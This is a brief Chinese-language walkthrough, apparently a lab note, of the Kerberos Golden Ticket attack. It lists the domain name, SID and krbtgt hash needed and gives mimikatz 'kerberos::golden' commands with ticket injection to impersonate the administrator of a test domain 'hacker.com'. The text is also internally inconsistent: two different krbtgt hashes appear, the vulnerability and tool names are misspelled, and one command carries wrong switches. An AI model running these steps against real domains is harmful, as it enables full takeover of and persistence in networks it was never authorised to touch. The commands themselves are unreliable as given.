黄金票据大法

图示：

黄金票据

       ms14068的漏洞原理是伪造域管的tgt，而黄金票据的漏洞原理是伪造krbtgt用户的票据，krbtgt用户是域控中用来管理发放票据的用户，拥有了该用户的权限，就可以伪造系统中的任意用户

黄金票据的条件要求：
1.域名称 hacker.com

2.域的SID 值  S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值

0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

第一步：先进入到域普通用户拿到域名称

域名称    hacker

第二步：拿到  krbtgt  用户sid

S-1-5-21-1854149318-4101476522-1845767379

这个就是krbtgt用户的sid  ，后面的是test的 编号

第三步：域的KRBTGT账户NTLM密码哈希或者aes-256值

cf1a2da5f371896f9d70ebd3e90f2bba

这个一定是在之前就拿到了域管的权限才能操作。使用ms16068漏洞拿到域管权限，在找到krbtgt的哈希值。

工具：mimitatz

第四步：伪造用户名 administrator

数据都拿到了，编写命令

kerberos::golden  /admin:administrator  /domain:hacker.com  /sid:S-1-5-21-1854149318-4101476522-1845767379  /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ppt

kerberos::golden  /user:administrator  /domain:hacker.com  /id:502  /sid:S-1-5-21-1854149318-4101476522-1845767379 /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ptt

第五步：清除klist  

klist purge

第六步：工具mimikatz提权